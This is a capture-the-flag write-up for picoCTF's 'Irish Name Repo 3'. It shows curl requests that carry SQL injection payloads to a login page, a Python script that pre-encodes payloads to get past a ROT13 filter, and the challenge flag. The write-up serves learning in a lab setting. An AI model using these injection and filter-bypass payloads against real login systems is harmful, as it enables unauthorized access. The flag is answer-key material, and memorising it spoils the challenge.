picoCTF

Irish Name Repo 3 [400 pts]

Challenge Description:

There is a secure website running at https://jupiter.challenges.picoctf.org/problem/40742/ or http://jupiter.challenges.picoctf.org:40742. Try to see if you can login as admin!


This time the website only gives us a password field, so our solution from the 2nd challenge in the series won’t work. Let’s try our first solution, 'or'1'='1. Unfortunately, submitting it returns nothing useful. This time we need to make use of the hidden debug parameter.

To find the hidden debug parameter, I opened the browser’s developer tools (Inspect), switched to the Network tab, and submitted a random value in the password field. Clicking the resulting login.php request and opening its Payload tab showed the form sends two fields: my password and a debug parameter set to 0.

A proxy such as Burp Suite makes it easy to change this parameter. However, the challenge can also be solved from a terminal (or the picoCTF webshell) with nothing but the curl command.

According to the curl man page, “curl is a tool for transferring data from or to a server.”
Hence, we can send our own POST request straight to login.php, the script that evaluates our input, with whatever payload we like.

Let’s first try our original input, but now with the debug parameter enabled.

curl -d "password='or'1'='1&debug=1" https://jupiter.challenges.picoctf.org/problem/40742/login.php
Note that -d sends the string as the body of a POST request with Content-Type application/x-www-form-urlencoded, which is exactly what the HTML form does; the & separates the two fields, and because the whole string is wrapped in double quotes the single quotes reach the server intact. curl does not URL-encode -d data, which is fine here since the server echoes the value back unchanged.

This command should return the following:

<pre>password: 'or'1'='1
SQL query: SELECT * FROM admin where password = ''be'1'='1'
</pre>

So login.php ran our whole input through a substitution before building the query: the only letters in the payload, ‘o’ and ‘r’, became ‘b’ and ‘e’, while the quotes, digits and ‘=’ were left alone. With a basic knowledge of cryptography and rotations, you might recognize this as ROT13. You can confirm this with an online calculator or by simply counting: ‘o’ and ‘r’ are the 15th and 18th letters of the alphabet, ‘b’ and ‘e’ are the 2nd and 5th, and 15 + 13 = 28 wraps around to 2 while 18 + 13 = 31 wraps around to 5.

Thus, since ROT13 is its own inverse (applying it twice gives back the original), we can pre-encode the payload: replace the “or” in our input with “be”, and the server’s own filter will turn it back into “or” before the query is executed. The rest of the payload is unaffected because ROT13 leaves non-letters alone, and the debug output also shows the password is spliced into the query without any escaping, so the injection itself still works.
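To make the ROT13 reasoning concrete, here is an added Python example (my own, not code from the challenge or from the original writeup). The server_query function is a reconstruction of what the debug output shows login.php doing, not the script’s actual source. The example models the filter, recovers the shift from one sent/echoed pair, and pre-encodes a payload; it is written for an arbitrary Caesar shift rather than just 13, so the same approach applies if a variant rotates by some other amount, and it reports when the echoed value is not a plain rotation at all.

```python
"""Model of the ROT13 filter in front of the SQL query, plus a shift detector.
Added example for the writeup; server_query is reconstructed from the echoed
debug output, not taken from the challenge's login.php."""


def caesar(text: str, shift: int) -> str:
    """Rotate every ASCII letter by `shift` places (ROT13 is shift=13).

    Digits, quotes, '=' and spaces pass through untouched, which is why the
    only characters that changed in the debug output were the letters o and r.
    """
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    return caesar(text, 13)


def infer_shift(sent: str, observed: str):
    """Recover the rotation from one (sent, echoed) pair.

    Returns the shift if every letter moved by the same amount (case kept)
    and every non-letter stayed put. Returns None otherwise, meaning the
    server is doing something other than a plain rotation and pre-encoding
    with a Caesar shift will not beat it.
    """
    if len(sent) != len(observed):
        return None
    shift = None
    for a, b in zip(sent, observed):
        if a.isascii() and a.isalpha():
            if not (b.isascii() and b.isalpha()) or a.isupper() != b.isupper():
                return None
            s = (ord(b) - ord(a)) % 26
            if shift is None:
                shift = s
            elif s != shift:
                return None
        elif a != b:
            return None
    return shift


def server_query(password: str) -> str:
    """What the debug output shows login.php doing: ROT13 the submitted
    password, then splice it into the query with no escaping at all."""
    return f"SELECT * FROM admin where password = '{rot13(password)}'"


def craft_payload(intended: str, shift: int = 13) -> str:
    """Pre-apply the inverse rotation so the server's filter restores `intended`.

    For ROT13 the inverse is ROT13 itself (13 + 13 = 26); for any other shift
    we rotate by -shift, which caesar() handles via the modulo."""
    return caesar(intended, -shift)


if __name__ == "__main__":
    wanted = "'or'1'='1"  # the payload from the first challenge in the series
    print("query for the raw payload:    ", server_query(wanted))
    shift = infer_shift(wanted, rot13(wanted))  # stand-in for the echoed debug line
    print("shift recovered from the echo:", shift)
    payload = craft_payload(wanted, shift)
    print("pre-encoded payload to send:  ", payload)
    print("query the server then runs:   ", server_query(payload))
```

Running it reproduces both debug lines from the writeup: the raw payload yields the ''be'1'='1' query, and the pre-encoded 'be'1'='1 payload yields the working ''or'1'='1' query. The infer_shift check is worth keeping around: if a filter also touched digits or quotes, it would return None and save you from guessing further.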

curl -d "password='be'1'='1&debug=1" https://jupiter.challenges.picoctf.org/problem/40742/login.php

<pre>password: 'be'1'='1
SQL query: SELECT * FROM admin where password = ''or'1'='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{3v3n_m0r3_SQL_4424e7af}

We got the flag!

picoCTF{3v3n_m0r3_SQL_4424e7af}